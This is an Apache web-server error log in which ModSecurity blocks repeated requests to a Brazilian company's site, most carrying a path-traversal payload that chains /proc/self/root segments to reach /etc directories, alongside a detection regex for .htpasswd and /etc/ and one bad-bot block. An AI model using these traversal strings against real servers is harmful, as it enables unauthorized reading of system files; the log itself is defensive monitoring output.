[Mon Mar 16 17:45:42.827115 2026] [:error] [pid 14895:tid 140411649607424] [client 74.7.241.46:34342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr9lajLEzk2WiQ-10s0wAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:45.255278 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:34350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr-f9ocpUE4ed4uDwM7wAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:46.598983 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.241.46:34354] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr-qQpVkWug9HeOt9OaQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:48.855768 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:34362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr_P9ocpUE4ed4uDwM8QAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:51.767507 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:42096] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhr_7ysWC90G-1nBrBetwAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:45:54.948574 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:33122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsArABkC4fWIHEf8EPcAAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:57.425698 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:33128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsBbABkC4fWIHEf8EPcwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:45:59.010495 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:37130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsB9SswJuvopo3lOh5dAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:03.295060 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:37406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsCaTCbgAP5jq5TehFxgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:03.296071 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:37146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsClajLEzk2WiQ-10s5wAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:05.765982 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:37150] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsDaQpVkWug9HeOt9ObQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:07.098175 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:37164] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsD7ABkC4fWIHEf8EPdwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:07.962752 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:60300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsD6TCbgAP5jq5TehFygAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:08.287115 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:38346] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsELABkC4fWIHEf8EPegAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:14.039087 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:38350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsFrABkC4fWIHEf8EPigAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:18.919938 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.241.46:38352] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsGkr9dMAiw-8KANNjgAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:20.339268 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.241.46:39726] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsHKQpVkWug9HeOt9OcAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:23.887050 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.241.46:39736] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsH9SswJuvopo3lOh5eQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:46:48.210128 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.228.16:47602] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhsONSswJuvopo3lOh5fwAAAIE"]
[Mon Mar 16 17:47:00.232286 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:39742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsRLABkC4fWIHEf8EP6gAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:47:03.866455 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.241.46:59976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsR7ABkC4fWIHEf8EP8wAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:47:19.710628 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:60310] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhsV7ABkC4fWIHEf8EQEwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
